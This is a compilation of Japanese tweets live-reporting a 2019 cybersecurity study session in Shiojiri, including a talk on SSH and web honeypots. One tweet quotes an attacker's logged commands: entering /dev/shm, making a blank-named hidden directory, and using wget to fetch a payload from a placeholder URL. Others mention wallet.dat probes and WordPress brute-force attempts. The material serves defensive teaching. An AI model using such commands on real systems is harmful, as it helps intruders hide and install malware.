【第4回】サイバーセキュリティ勉強会2019 in 塩尻

長野県塩尻市で開催したサイバーセキュリティのイベント
1
前へ 1 2 3 ・・ 13 次へ
VitzRsTurbo @VitzRsTurbo

攻撃者はビジネス目的でやってくるが、まずはそのコンピュータを攻略する、という点からハニーポットの観察は有効 #shiojiri_oss

2019-02-16 16:32:16
古籏一浩 @openspc

イベント:ハニーポットの講演終了 #shiojiri_oss

2019-02-16 16:30:42
古籏一浩 @openspc

イベント:/backup/bitcoin/wallet.dat 閲覧を試みているファイルはwallet.dat バックアップディレクトリが狙われている。 #shiojiri_oss

2019-02-16 16:28:48
古籏一浩 @openspc

イベント: GET /wordpreess/wp-login.php HTTP/1.1 「ワードプレスを使いたいんだな、はいWordPress動いてますよ、どうぞ」 ログインブルート攻撃がやってくる #shiojiri_oss

2019-02-16 16:11:20
古籏一浩 @openspc

イベント:攻撃者をおもてなしするWOW Honeypotの紹介。 攻撃者が見たいものを用意しておくのが、これ。 #shiojiri_oss

2019-02-16 16:10:00
古籏一浩 @openspc

イベント:2018年ではビットコインを採掘するもの(マイニング)を入れていくものが多い。 #shiojiri_oss

2019-02-16 16:09:14
古籏一浩 @openspc

イベント:不正ログインの形跡。以下は実際のコマンド。空白のディレクトリを作るのがポイント w uname -a make ftp cd /dev/shm mkdir " " cd " " wget ファイルがあるURL >>>gosh.tgza.tar rm 0rf gosh,tgz,tar cd gosh #shiojiri_oss

2019-02-16 16:08:08
古籏一浩 @openspc

イベント:iPhoneもハニーポットだと思っている。 電車などで近くにいる人に怪しい画像を送って相手の反応を見るという嫌がらせが発生している。 #shiojiri_oss

2019-02-16 16:06:10
古籏一浩 @openspc

イベント:SSHハニーポット  SSHでリモートアクセスしてきた攻撃者の入力されたOSコマンドを記録し観察することができる。  Webハニーポット  HTTPの要求内容を受け付けてWebアプリケーションの脆弱性やファイルの調査などの行動を観察することができる。 #shiojiri_oss

2019-02-16 16:05:00
古籏一浩 @openspc

イベント:低対話型のハニーポット →実在するソフトウェアなどを模倣する方式 #shiojiri_oss

2019-02-16 16:03:26
古籏一浩 @openspc

イベント:ハニーポットを運用している人のことをハニーポッターと言います。(会場:今日一番の笑い) #shiojiri_oss

2019-02-16 16:02:32
古籏一浩 @openspc

イベント:ハニーポッター秘密の講演 #shiojiri_oss

2019-02-16 16:01:29
古籏一浩 @openspc

イベント:SSHハニーポット、Webハニーポットの2つを紹介。 ・攻撃方法 ・攻撃ログ #shiojiri_oss

2019-02-16 16:00:56
古籏一浩 @openspc

イベント:ハニーポット関係の資料は後で公開されます。 後で公開される資料は、個人的に収集したものになります。 ハニーポットが好きで勉強会や交流会などを開いている 東京だけでは増えないので、大阪に行ったり他のところに行ったりしている #shiojiri_oss

2019-02-16 16:00:09
古籏一浩 @openspc

イベント:次は「ハニーポットで見る攻撃の検知傾向」です。 都合によりストリーミング等はできません。 #shiojiri_oss

2019-02-16 15:58:06
VitzRsTurbo @VitzRsTurbo

お!この次の発表はオフレコかぁ。 #shiojiri_oss

2019-02-16 15:57:19
古籏一浩 @openspc

イベント:SPREADの講演おわり。 次はハニーポット関係ですが、都合によりオフレコになっています。 中継も停止します。 #shiojiri_oss

2019-02-16 15:57:06
VitzRsTurbo @VitzRsTurbo

あなたの「知っている」を誰かの「知っている」へ #shiojiri_oss

2019-02-16 15:55:41
VitzRsTurbo @VitzRsTurbo

一人でやっていると行き詰まってしまうのでほかのサポーターと交流してみる。 #shiojiri_oss

2019-02-16 15:50:10
古籏一浩 @openspc

イベント:SPREAD×シスコネットワーキングアカデミー サイバーセキュリティについてWebで受講できるセミナー #shiojiri_oss

2019-02-16 15:49:06
VitzRsTurbo @VitzRsTurbo

CISCOと協力してe-Learningみたいなこともやっている。 #shiojiri_oss

2019-02-16 15:48:39
古籏一浩 @openspc

イベント:参加型セミナー まずセミナーの受講 次に参加者同士でディスカッション 過去のテーマとして「SNSの設定どうしてる?」「災害×ITもしもの時のセキュリティ」「やってみよう大人のフィルタリング」 #shiojiri_oss

2019-02-16 15:47:31
前へ 1 2 3 ・・ 13 次へ